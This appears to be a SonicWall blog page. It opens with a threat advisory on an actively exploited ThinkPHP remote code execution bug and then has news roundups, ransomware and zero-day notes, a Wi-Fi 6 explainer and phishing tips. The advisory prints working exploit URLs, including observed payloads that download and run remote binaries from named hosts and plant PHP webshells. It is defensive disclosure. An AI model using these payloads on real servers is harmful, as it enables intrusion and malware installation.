ThinkPHP Remote Code Execution (RCE) bug is actively being exploited

ThinkPHP is a web application development framework based on PHP, distributed under the Apache2 open-source license. It focuses on rapid development of enterprise projects and is very popular in China where over 40,000 servers run ThinkPHP.

Vulnerability Overview:

ThinkPHP has recently released a security update to fix an unauthenticated high risk remote code execution(RCE) vulnerability. This is due to insufficient validation of the controller name passed in the url, leading to possible getshell vulnerability without the forced routing option enabled.

ThinkPHP parses the url query parameters to retrieve the module, controller and the function. It then checks to see if there exists a class for the the controller name. If so, it instantiates an object of this class and executes the function passed in the url.

The url query given below gets parsed by using the separator character ‘/’. Ideally controller class should not take ‘\’ in the name. Because of the existing bug, ‘\think\app’ is parsed as controller class name and ‘invokefunction’ as the function. It then creates an instance of the controller class ‘App’ within ‘think’ and then calls the method ‘invokefunction’. ‘invokefunction’ can take arbitrary function as its argument, allowing threat actors to perform remote code execution.


?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

The same vulnerability allows remote code execution through another controller class ‘Request’ in ThinkPHP.  Request class can be instantiated with the url below allowing cache function to execute the arbitrary function provided as part of the url query.


?s=index/\think\request/cache&key=1|phpinfo

This is due to framework’s insufficient validation on the controller name, allowing arbitrary remote code execution or even access to the server

ThinkPHP has fixed the vulnerability by having additional checks using regular expression.


Exploit Campaign:

SonicWall Threat Research Lab has observed various attempts to exploit the recently disclosed ThinkPHP RCE vulnerability. It seems to be adopted by threat actors immediately after public disclosure. This vulnerability is currently being exploited by different threat groups to install botnets and other malicious code on the servers running vulnerable versions of ThinkPHP.

Find below some of the URL’s trying to exploit the ThinkPHP RCE vulnerability

    1. index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget http://cnc.arm7plz.xyz/bins/set.x86 -O /tmp/.eSeAlg; chmod 777 /tmp/.eSeAlg; /tmp/.eSeAlg thinkphp
    2. index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo'<?php eval($_POST[qazw]);?>’ > result.php
    3. index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r ‘print(“tj”.” tj”);
    4. index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile(‘http://a46.bulehero.in/download.exe’,’C:/12.exe’);start C:/12.exe
    5. index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl 46.30.43.159:81/zz
    6. index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
    7. index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl 176.32.33.124/zzta
    8. index.php?s=index/\think\app/invokefunction&function=assert&vars[0]=${@print(eval(phpinfo().fputs(fopen(‘lx.php’,’w’), Base64_decode(‘Q25sdVh1bjw/cGhwIEBldmFsKCRfUE9TVFsnbHgnXSk7Pz4=’))))}

Fix:

Upgrade to ThinkPHP version 5.0.23 or 5.1.31 to resolve the issue.
If you use a content management system that’s based on ThinkPHP5, It is likely affected by this vulnerability.

Vendor advisory link: https://blog.thinkphp.cn/869075

Sonicwall Threat Research Lab provides protection against this exploit with the following signatures:

  • IPS: 13955 ThinkPHP Remote Code Execution
  • IPS: 13965 ThinkPHP Remote Code Execution 2
  • WAF: 1689 ThinkPHP Remote Code Execution

Cyber Security News & Trends

Quantum Cryptography, Malware spreading through the cloud, and Fortnite making teenagers a lot of money; SonicWall has collected and compiled this week’s best cybersecurity stories, just for you.


SonicWall Spotlight

CEO Outlook: Five Questions on 2019  – CRN.com

  • SonicWall CEO Bill Conner gives his five predictions for 2019; from the biggest market opportunities to his thoughts on why staying up-to-date will be key for Channel Partners. He also predicts that 2019 will be the year of the SonicWall Capture Cloud Platform.

SonicWall Increasing Local Partner Support Across EMEA – Computer Weekly

  • SonicWall celebrates key EMEA milestones including the hiring of industry-leading talent and the opening of three new offices in the UK, Spain, and the UAE.

Quantum Cryptography: The Next-Generation of Secure Data Transmission – Information-Age

  • With SonicWall Threat Data showing an increase in encrypted threats throughout 2018, Information Age speculate that quantum cryptography could be the future in encryption.

Cyber Security News

Public Clouds: Fertile Ground to Spread Malware – Security Boulevard

  • A general trust in cloud services is leaving an easy entry point open for threat actors to spread malware. Researchers have already found browser hijacker adware Linkury making its way across Microsoft Azure.

Hackers Have Earned $1.7 Million so Far From Trading Data Stolen From US Gov Payment Portals – ZDNet

  • Click2Gov, a US government self-service payment system owned by Superion, was hit by a data breach in September 2017. Security researchers are estimating that the hackers have earned at least $1.7 million to date selling the information on the Dark Web.

Google Finds Internet Explorer Zero-Day Exploited in Targeted Attacks – Security Week

  • Microsoft released a patch for Internet Explorer fixing a dangerous zero-day bug. SonicWall Captures Labs also issued a signature to provide protection.

Fortnite Teen Hackers ‘Earning Thousands of Pounds a Week’ – BBC

  • With Fortnite estimated to have earned more than £1 billion through selling in-game “skins” there is a growing black-market, often run both by and for very young teenagers.

Irish Data Authority Probes Facebook Photo Breach – Security Week

  • A GDPR investigation has been launched in Ireland after it was revealed that up to 6.8 million users may have had their photos exposed to third party apps. A fine of up to four percent of annual global turnover can be issued to a corporation if they are found to be in breach of GDPR.

New Malware Pulls Its Instructions From Code Hidden in Memes Posted to Twitter – Tech Crunch

  • Researchers have found a type of malware that appears to be activated by memes on Twitter. The good news for those who can’t resist a link to a laugh is that it still looks to be in a testing stage and may never be released.

NASA Discloses Data Breach – ZDNet

  • NASA confirmed a data breach in October 2018 where a third party gained access to personal data, including Social Security Numbers, of current and former employees. No missions are believed to jeopardized by the hack but the investigation into the incident will “take time.”

The Nightmare Before Christmas: Cybersecurity Risks for Children’s Toys – EURACTIV (Europe)

  • As the Internet of Things enters toy manufacturing a host of problems are coming with it; open Bluetooth connections, cheap manufacturing standards, and cybersecurity laws that cannot yet be effectively applied.

In Case You Missed It

Evolution Ransomware actively spreading in the wild.

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of Evolution Ransomware [Evolution.RSM] actively spreading in the wild.

Evolution encrypts the victims files with a strong encryption algorithm until the victim pays a fee to get them back.

Contents of the Evolution ransomware

Infection Cycle:

The Ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ (_H0W_TO_REC0VER_[Random].html
    • %App.path%\ (_H0W_TO_REC0VER_[Random].txt
    • %App.path%\ (_H0W_TO_REC0VER_[Random].lnk
    • %App.path%\ [File Name]. Random
    • %Userprofile\Desktop %\ (_H0W_TO_REC0VER_[Random].html
      • Instruction for recovery

Once the computer is compromised, the Ransomware runs the following commands:

The Ransomware encrypts all the files and appends random extension such as [.hAOrGb]  onto each encrypted file’s filename.

After encrypting all personal documents the Ransomware shows the following webpage containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Evolution.RSM (Trojan)

5 Tips to Keep You Cybersecure During Holiday Travel

The holiday season is one of the busiest times of the year for travel, which means it’s also one of the most vulnerable times of the year for travelers’ belongings, including sensitive personal data.

Those looking forward to spending time away from the office and relaxing with friends and family are likely making plans to secure their belongings at home, but what about securing devices and data?

Year-to-date attack data through November 2018 shows an increase in attacks across nearly all forms of cybercrime, including increases in intrusion attempts, encrypted threats, and malware attacks.

Below are some simple ways to consider protecting your cyber assets and have peace of mind during a well-earned holiday break.

  1. Lock Devices Down
    While traveling, lock all your mobile devices (smartphones, laptops, and tablets) via fingerprint ID, facial recognition, or a PIN number. This will be the first line of defense against a security breach in the event that any of your devices have been momentarily misplaced or forgotten.
  2. Minimize Location Sharing
    We get it! You want to share the fun memories from your trip with your friends and family on social media. However, excessive sharing, especially sharing of location data, creates a security threat at home.If you’re sharing a photo on a boat or at the Eiffel Tower, it’s easy for a criminal to determine you’re not at home or in your hotel room, which leaves your personal property left behind vulnerable to theft of breach. If you must share location data, wait until after you have returned home to geotag that selfie from your trip.
  3. Bring Your Own Cords and Power Adapters
    Cyber criminals have the ability to install malware in public places such as airport kiosks and USB charging stations. If you are unable to find a secure area to charge your devices or you are unsure of the safety of the charging area, power your device down prior to plugging it in.
  4. Disable Auto-Connect
    Most phones have a setting that allows a device to automatically connect to saved or open Wi-Fi networks. This feature is convenient when used at home, but can leave your device vulnerable to threat actors accessing these features for man-in-the-middle attacks.Disable the auto-connect features on your devices and wipe saved network SSIDs from the device prior to your trip to avoid exploitation.
  5. Be Cautious of Public Wi-Fi
    Free Wi-Fi access can often be found at coffee shops and in hotel lobbies as a convenience to travelers, but unencrypted Wi-Fi networks should be avoided. Before you connect to a new Wi-Fi source, ask for information regarding the location’s protocol and if you must use a public Wi-Fi connection, be extra cautious.Use a VPN to log in to your work networks and avoid accessing personal accounts or sensitive data while connected to a public Wi-Fi source.

Cybercrime is Trending up During the Holiday Season

For the 2018 holiday shopping season, SonicWall Capture Labs threat researchers collected data over the nine-day Thanksgiving holiday shopping window and observed a staggering increase in cyberattacks, including a 432 percent increase in ransomware and a 45 percent increase in phishing attacks.

LIVE WORLDWIDE ATTACK MAP

Visit the SonicWall Security Center to see live data including attack trends, types, and volume across the world. Knowing what attacks are most likely to target your organization can help improve your security posture and provide actionable cyber threat intelligence.

Microsoft IE Zero day CVE-2018-8653

Microsoft released an Out of Band security update today to cover a new zero day (CVE-2018-8653) in Internet Explorer’s scripting engine.

Microsoft describes this vulnerability, as a remote code execution vulnerability in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.

If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website, for example, by sending an email.

SonicWall Capture Labs provides protection against this threat via the following signature:

IPS 13959 : Scripting Engine Memory Corruption Vulnerability (DEC 18) 5

ASPY 5345:  Malformed-File html.MP.79

4 Security Predictions for MSSPs in 2019

Each year introduces new cyberattack trends that MSSPs must track, analyze and solve for their customers. Many new attack techniques amount to nothing. Others have devastating impact. But it’s important to remain diligent in monitoring the behaviors of cybercriminal organizations.

What security challenges will you face in 2019? Here are four predictions that could affect how you safeguard your customers in the fast-moving cyber threat landscape.

Cryptojacking will impact your resources.

In case you’re not aware, but as of late 2017, cryptomining made up a half of percent of the world’s energy consumption. In 2019, the main cryptocurrencies will become too expensive to mine legitimately, and cryptomining facilities will either liquidate assets, wait for a price spike again or switch to mining a different altcoin. The legitimate mining of coins is too difficult, thus the spike in cryptojacking.

Cryptominers are a type of malware that are discretely embedded on machines with a single objective: use your processing power to illegally mine for cryptocurrency. It’s not a breach or compliance issue, so it doesn’t always grab the headlines. But cryptojacking will steal resources — from both you and your customers. This form of malware is also very difficult to detect.

The impact to your customers will likely be slower computers and collateral damage that’s a byproduct of the malware itself. To MSSPs, it can be even more damaging. If you have less compute power, you’ll need more boxes to serve your customers … costing you more and more money until the malware is properly mitigated.

The best methods for stopping malware include an overlapping approach of next-generation firewalls, secure email solutions, real-time sandboxing and advanced endpoint security, which help detect and block modern and never-before-seen malware variants, including emerging cryptojacking attacks.

Ransomware will spike again.

While many cybersecurity vendors are still collecting full-year data for 2018, SonicWall’s year-to-date threat intelligence shows a massive ransomware spike in 2018 after a down 2017. And SonicWall’s early prediction is that 2019 will likely witness the same trend. Despite wild downward swings in cryptocurrency prices, the demands remain the same, but language is changed to reflect specific dollar amounts: “Send $750 USD worth of bitcoin.”

Through November 2018, SonicWall recorded an 119 percent year-to-date increase in ransomware attacks. In fact, each SonicWall customer faced an average of 56 ransomware attacks — in November alone. That’s a 149 percent increase over the same month last year.

Ransomware is very visible, very damaging and potentially very expensive — either for ransom payout or post-infection remediation. Simply, ransomware has a scare factor and will be noticed by your customers.

Ransomware is also a mess to clean up for MSSPs and costs you even more in support calls and tickets. The worst part? If a customer becomes a ransomware victim, there’s a high likelihood your reputation is tarnished and your relationship damaged.

Encrypted threats will continue slow rise.

It’s slow and steady, but cyberattacks via encrypted traffic (SSL/TLS) will continue to increase in volume.  As long as an attacker applies for an TLS certificate with the same name that matches his/her domain registration, the (often free) certificate is theirs. Any malicious payloads delivered from said domain/website cannot be inspected by traditional means.

For the most part, SSL/TLS traffic remains an unchecked attack vector for cybercriminals to exploit. Until organizations get serious about responsibly decrypting and inspecting SSL/TLS traffic, cybercriminals will leverage it to circumvent strong networks security controls.

As an MSSP, it’s smart to advise customers to leverage next-generation firewalls and other security appliances that offer deep packet inspection of SSL/TLS traffic. This will help further reduce the attack surface area of your customers.

Customers will want you to prove your worth.

Cybersecurity is a booming — and expensive — business. So much so, many of your customers are more educated about malware trends, evolving attack strategies and criminal behavior. And thanks to data breaches published daily in the news, it’s now part of the mainstream dialogue, too.

In short, savvy customers have more awareness than ever and want indicators that demonstrate how you’re protecting their business — and how much it costs to get those results.

Many security vendors and MSSPs are already down this path. If you’re one that hasn’t yet added this to your value-add, it’s time to plan and market solutions and services that deliver customized threat intelligence to your customers. New real-time data and analysis make it easier to prove your worth.


This story originally appeared on MSSP Alert and was republished with permission.

Is 802.11ax Going Away? And What is Wi-Fi 6?

The Wi-Fi Alliance has announced a change in the Wi-Fi naming standards. Yep. That’s right. The terms that you are now used to — like 802.11ax, 802.11ac and 802.11n — are being replaced with a much simpler naming scheme: Wi-Fi 6, Wi-Fi 5 and Wi-Fi 4, respectively.

Anything that predates 802.11n isn’t officially getting a name change. This move from Wi-Fi Alliance is aimed at making it simpler for manufacturers and consumers to understand and use the technologies. Along with the new names, they get new logos as well. However, from a regulatory and specification standpoint, the names still retain its techy naming scheme: IEEE 802.11.

“For nearly two decades, Wi-Fi users have had to sort through technical naming conventions to determine if their devices support the latest Wi-Fi,” said Edgar Figueroa, president and CEO of Wi-Fi Alliance, in the official announcement. “Wi-Fi Alliance is excited to introduce Wi-Fi 6, and present a new naming scheme to help industry and Wi-Fi users easily understand the Wi-Fi generation supported by their device or connection.”

New Wi-Fi Naming Standards

  • Wi-Fi 6 identifies devices that support 802.11ax technology
  • Wi-Fi 5 identifies devices that support 802.11ac technology
  • Wi-Fi 4 identifies devices that support 802.11n technology

Source: Wi-Fi Alliance

According to a new study by the Wi-Fi Alliance, the global economic value of Wi-Fi will reach $1.96 trillion this year and increase to $3.5 trillion by 2023. To keep up with the proliferation of Wi-Fi devices, it is essential to introduce technologies to keep pace with the changing tides. One of the most talked about wireless technologies in the recent times is the 802.11ax standard, or Wi-Fi 6.

What is Wi-Fi 6?

Wi-Fi 6 is currently deemed the future of Wi-Fi. Why? This is because it introduces significant wireless enhancements over the current Wi-Fi 5 technology.

With the rise in the number of devices and bandwidth-intensive applications, one of the biggest challenges we face on Wi-Fi networks is poor performance. In addition to having high, system-wide throughput, it is also essential to ensure high performance on a per-client basis, specifically for high-density use cases.

This is where Wi-Fi 6 could greatly improve performance, concurrent connections and business productivity. The significant benefits introduced by Wi-Fi 6 include:

  • Orthogonal Frequency Division Multiple Access (OFDMA) Wi-Fi 6 introduces OFDMA, which is an enhancement over orthogonal frequency-division multiplexing (OFDM), a technology that is used in Wi-Fi 5 and dates back to the 802.11a era. OFDM allows only one transmission at a time. OFDMA, in comparison, divides a channel into resource units to allow multiple communications simultaneously.With Wi-Fi 6, each resource unit can be as low as 2MHz and as high as 160MHz. This enables multiple data transmissions across multiple devices at the same time, improving overall network efficiency and capacity. Doing so allows frequencies to be divided into smaller subcarriers so that traffic can be coordinated to serve more packets from more devices, increasing the network’s capacity.
  • Upstream and Downstream Multi-User Multiple-In Multiple-Out (MU-MIMO)
    With Wi-Fi 5 Wave 2, MU-MIMO was restricted to only downstream communication, whereas Wi-Fi 6 adds support for MU-MIMO in both upstream and downstream communications. Previously, only the wireless access point (AP) could transmit data to clients simultaneously. Now, clients can transmit data simultaneously back to the AP.
  • 1024 Quadrature Amplitude Modulation (QAM)
    Wi-Fi 5 supports 256 QAM, while Wi-Fi 6 can support 1024 QAM. This denser modulation enables a speed burst of more than 35 percent. This boosts Wi-Fi performance and is most effective for users closer to the access point.
  • Target Wake Time (TWT)
    This mechanism enables AP and client devices to coordinate wake times when devices need to be awake. Doing so improves efficiency, reduces contention and enables power-saving by identifying times when the devices will be awake to send or receive data. This is especially useful in the Internet of Things (IoT) space, leading to significant power-savings for battery-powered devices.
  • Enhancement to 5GHz and 2.4GHz Frequency Bands
    Unlike the Wi-Fi 5 standard that introduced enhancement to only the 5GHz band, Wi-Fi 6 introduces enhancement to both 2.4GHz and 5GHz bands. Data speed of up to 9.6 Gbps is possible with Wi-Fi 6. Enhancements offered by Wi-Fi 6 boost average per-client performance by up to four times in comparison with Wi-Fi 5. In addition, Wi-Fi 6 is backwards-compatible with older technologies like Wi-Fi 5 and Wi-Fi 4.

Solving Challenges with the Wi-Fi 6 Wireless Standard

Wi-Fi 6 is designed for IoT and high-density deployments, including stadiums, universities, shopping malls, transportation hubs, where there are large congregations of people.

At this point in time, Wi-Fi 6 technology is still being amended. The finalized draft is expected in late 2019. Until the standard is finalized, it is not advisable to purchase Wi-Fi 6 products.

In addition, there are no real-world clients to benefit from the Wi-Fi 6 enhancements. Let’s face it, even the latest Apple iPhone XS doesn’t even support Wi-Fi 5 Wave 2. The time is right to expand your network on Wi-Fi 5, as it still gaining traction.

SonicWall offers cutting-edge Wi-Fi 5 Wave 2 access points to address the growing needs of Wi-Fi 5 devices. To learn more about how you can securely expand your network, click here.

Executive Brief: Securing the Next Wave of Wireless

Wireless connectivity is ubiquitous in today’s mobile, global economy. Wireless devices range from smartphones and laptops to security cameras and virtual reality headsets. Businesses need to recognize and address their need for high quality, performance and security across wireless networks and endpoints.

Cyber Security News & Trends

A history of data breaches, SonicWall expands in Dubai and India, and the reappearance of Shamoon. It’s your cybersecurity news roundup for the week.


SonicWall Spotlight

NetSecOPEN Names Founding Members, Board of Directors – Dark Reading

  • SonicWall is amongst the founding members of NetSecOPEN, an organization that aims to create open network security testing standards. Atul Dhablania’s testimonial confirms SonicWall’s dedication.

The 10 Coolest New Cybersecurity Tools of 2018 – CRN

  • SonicWall Capture Cloud Platform is included on CRN’s coolest tool list for its advanced capabilities at analyzing, classifying and blocking malware.

SonicWall Strengthens Regional Presence With New Dubai HQ – Tahawultech (India)

  • SonicWall executive director Michael Berg is interviewed on video talking about the opening of SonicWall’s new office in Dubai.

India, a Key High Growth Market for SonicWall – CRN India

  • Debasish Mukherjee talks SonicWall’s expansion in India, explaining how it’s strong technology that allows SonicWall to stand out from the crowd.

Cyber Security News

The Wired Guide to Data Breaches – Wired

  • Wired trace the history of electronic data breaches, from a 1984 credit agency leak all the way up to present-day, and look at the future of the cyber arms race.

Is Tech Too Easy to Use? – The New York Times

  • The increase in frictionless tech experiences means end users often don’t think about how their data is being collected and used. This can have devastating effects down the line if a data breach occurs.

Google to Shut Down Google+ Early Due to Bug That Leaked Data of 52.5 Million Users – NPR

  • After inadvertently giving app developers access to information on over 52 million users in November of this year, Google is shutting down Google+ in April rather than August 2019.

Super Micro Finds No Malicious Hardware in Motherboards  – The Wall Street Journal

  • After headline reports earlier this year claimed that the Chinese government had secretly planted spying chips into computers assembled in China, Super Micro Computers Inc. this week told customers that they can find no evidence of hardware tampering.

Poll: Cyber Crime Has Affected One in Four Americans – The Hill

  • Gallup asked the American public if they or a close family member had been affected by cybercrime and 23 percent say they had.

Fortune 500 Cybersecurity Is Better and Worse Than You’d Think – Axios

  • Rapid7 released their first Industry Cyber-Exposure Report and found huge problems with email security at more than half of Fortune 500 companies. However, it also found that most are doing a good job at reducing entry points.

Over Half of Brazil’s Population Exposed in Security Incident – ZDNet

  • As many as 120 million Brazilian citizens had their ID numbers publicly accessible for weeks in the early months of 2018.

Shamoon Reappears, Poised for a New Wiper Attack – Threat Post

  • Shamoon is a data-wiping malware that can completely cripple an infected PC that previously made world news targeting energy firms. It first emerged in 2012, made a comeback in 2016 and is now being detected again, leading experts to predict that another attack may be imminent.

In Case You Missed It

November Cyber Threat Data: Watch out for Encrypted Attacks

We’ve reviewed hard numbers from the SonicWall Capture Labs to provide you with our analysis of for November attack patterns, as well as advice on how to combat the trends we’re seeing in the cybersecurity landscape.

November Attack Data

Globally, the SonicWall Capture Threat Network, which includes more than 1 million sensors across the world, recorded the following 2018 year-to-date attack data through November 2018:

  • 9.8 billion malware attacks (29 percent increase from 2017)
  • 3.5 trillion intrusion attempts (41 percent increase)
  • 309 million ransomware attacks (119 percent increase)
  • 2.6 million encrypted threats (65 percent increase)

In November 2018 alone, the average SonicWall customer faced:

  • 1,545 malware attacks (48 percent decrease from November 2017)
  • 798,350 intrusion attempts (14 percent increase)
  • 56 ransomware attacks (149 percent increase)
  • 145 encrypted threats (2 percent decrease)
  • 20 phishing attacks each day (93 percent increase)

Ebb & Flow of Malware Volume

Despite nearly two years of dominating cyberattack data and headlines, SonicWall’s threat data for November shows that the number of malware attacks worldwide is on an interesting seasonal decline, particularly given the traditional volume around holiday shopping.

Earlier this year, SonicWall was reporting an average of around 1 billion malware attacks a month. As of November 2018, malware volume was 650 million, 48 percent less than the November 2017 high of 1.2 billion. Malware volume for the year, however, is still up 29 percent year to date.

Ransomware Continues to be a Global Concern

This does not mean that cybercriminals are slowing down. Any slack has been picked up with huge increases in web app attacks and ransomware this year. SonicWall previously covered the holiday-specific ransomware jumps, but the year has also seen some major regional spikes, with a 112 percent year to date increase in the U.S. and a staggering 1,671 percent increase in the Asia Pacific region.

In real numbers, this brings these regions almost level for the year with 124 million attacks in the U.S. compared to 121 million in Asia Pacific.

Encrypted Threats a Serious Risk

Encryption is growing at a steady rate: nearly 73 percent of all web traffic monitored by SonicWall is encrypted. Unfortunately, there is a corresponding increase in the number of threats that hide in encrypted traffic. SonicWall data shows a 65 percent increase in encrypted threats compared to 2017.

Encryption protocols, such as Transport Layer Security (TLS), Secure Sockets Layer (SSL) and Secure Shell (SSH), are used to hide cyberattacks. Many malware detection and intrusion prevention solutions are not built to inspect encrypted traffic.

Even entry-level SonicWall firewalls combat encrypted threats with Deep Packet Inspection of SSL/TLS-encrypted traffic and the latest TZ600P and TZ300P range includes PoE integration to cut down on unnecessary wiring.

SonicWall Capture Security Center

SonicWall cyber threat intelligence is available in the SonicWall Security Center, which provides a graphical view of the worldwide attacks over the last 24 hours, countries being attacked and geographic attack origins. This view illustrates the pace and speed of the cyber arms race.

The resource provides actionable cyber threat intelligence to help organizations identify the types of attacks they need to be concerned about so they can design and test their security posture ensure their networks, data, applications and customers are properly protected.

6 Phishing Scams to Look Out for this Holiday Shopping Season

It’s the most wonderful time of year … for cybercriminals. Why? Because it’s the easiest time for them to use phishing attacks to target busy holiday shoppers.

“Cyber Monday sales this year surged to new highs, with a record $7.9 billion spent online that day, an increase of 19.3 percent from a year ago,” according to CNBC, which featured data from Adobe Analytics. “That’s after Black Friday pulled in a record $6.22 billion in e-commerce sales, while sales online Thanksgiving Day totaled $3.7 billion.

It’s no wonder retailers had another recording-breaking year for online sales. Unfortunately, cybercriminals were just as successful. Over the nine-day Thanksgiving holiday shopping window (Nov. 19-27), SonicWall customers faced a 45 percent increase in phishing attacks compared to the average day in 2018. It’s a target-rich environment for cybercriminals to cash in, and the threat doesn’t end after Cyber Monday.

Don’t less phishers steal your holiday spirit. Thankfully, there are prove best practices to improve awareness so employees, consumers and businesses aren’t victimized by malware, ransomware or email threats like phishing attacks.

6 Phishing Attacks, Online Tricks & Holiday Scams to Avoid

Consumers are busy scouring the internet for the best deals whenever they get a few mins at work, whether in the office or remote. But this presents risk to both employees and businesses. Review these six attacks and scams to be on the look for this holiday season.

  • Spoofed Websites: It is estimated that 46,000 new phishing sites are created every day, many of which are propagated through email. According to the Anti-Phishing Working Group (APWG), about 35 percent of phishing attacks were hosted on websites that had HTTPS and SSL certificates, so looking for the lock icon is not enough anymore. Cybercriminals are getting savvier, hijacking the look and feel of popular brands and using spoofed domains with hard-to-catch spelling variations to steal information.
  • Phishing Emails: It’s the holiday season, so employees are in festive moods dreaming about vacation or distracted with online shopping. With the increase in the volume of phishing emails, it is easy to let the guard down and click on well-crafted phishing emails while trying to finish work before the holidays. Businesses should ensure they have a secure email solution implemented to mitigate email-based attacks.
  • Gift Card Scams: Most major retailers offer gift cards that can be purchased electronically. This is truly a gift for cybercriminals to lure victims into clicking on an email offering a free gift card from a major brand or, in the case of a targeted phishing attempt, the gift card may appear to be sent from someone familiar, like a friend or co-worker.
  • Shipping Invoices: This type of phishing email seemingly comes from a popular shipping service, such as FedEx, UPS or the USPS. Cybercriminals use the shopping season opportunistically to send email with phishing links under the guise of tracking a package or downloading a shipping label. Similar shipping phishing emails can come from major retailers like Amazon or Walmart
  • Illegitimate Apps: Shoppers are taking to mobile apps to shop and the cybercriminals are taking notice. Lookalike apps and rogue apps crowd popular app stores and, once downloaded, prompt for credit card information, social media login credentials or permission to access data on your phone.
  • Letters from Santa: Scammers send bogus emails promising to send your child a letter from Santa for a fee. Beware of clicking on such emails and providing payment information. Many, unfortunately, are scams that prey on unsuspecting parents.

Phishing Awareness for Employees, Businesses

Practicing simple awareness can keep employees and businesses safe from the majority of phishing-based cyberattacks. After all, criminals are counting on users to be too busy to take a few seconds to vet a deal, email or sale. Implement the following tips and best practices to ensure your holiday remains festive.

Tips for employees to enjoy shopping online safely:

  • If the deal is too good to be true, then it probably is … don’t take the bait
  • Stay away from suspicious websites promising coupon codes
  • Hover over and scan URLs before clicking; malicious URLs are usually easy to spot (e.g., unknown domains, long string of numbers, etc.)
  • Don’t provide personal information, such as passwords and credit card numbers, on unknown websites
  • Use only reputable websites for online shopping
  • Avoid using unsecure public Wi-Fi networks; if you must, use a virtual private network (VPN) to stay safe

Tips for organizations, businesses and enterprises to keep their employees safe:

  • Refresh employee awareness and training programs to help them identify phishing emails
  • Ensure endpoint devices are patched and updated
  • Implement layered security with the following critical components:

SonicWall automated, real-time breach detection and prevent solutions help organizations implement a layered security architecture for enterprises, SMBs, governments, retailers, healthcare organizations and more.

Exclusive Video: Why Layered Security Matters

SonicWall President and CEO Bill Conner and CTO John Gmuender walk you through the current cyber threat landscape, explore the importance of automated real-time breach detection and prevention, and address how to mitigate today’s most modern cyberattacks.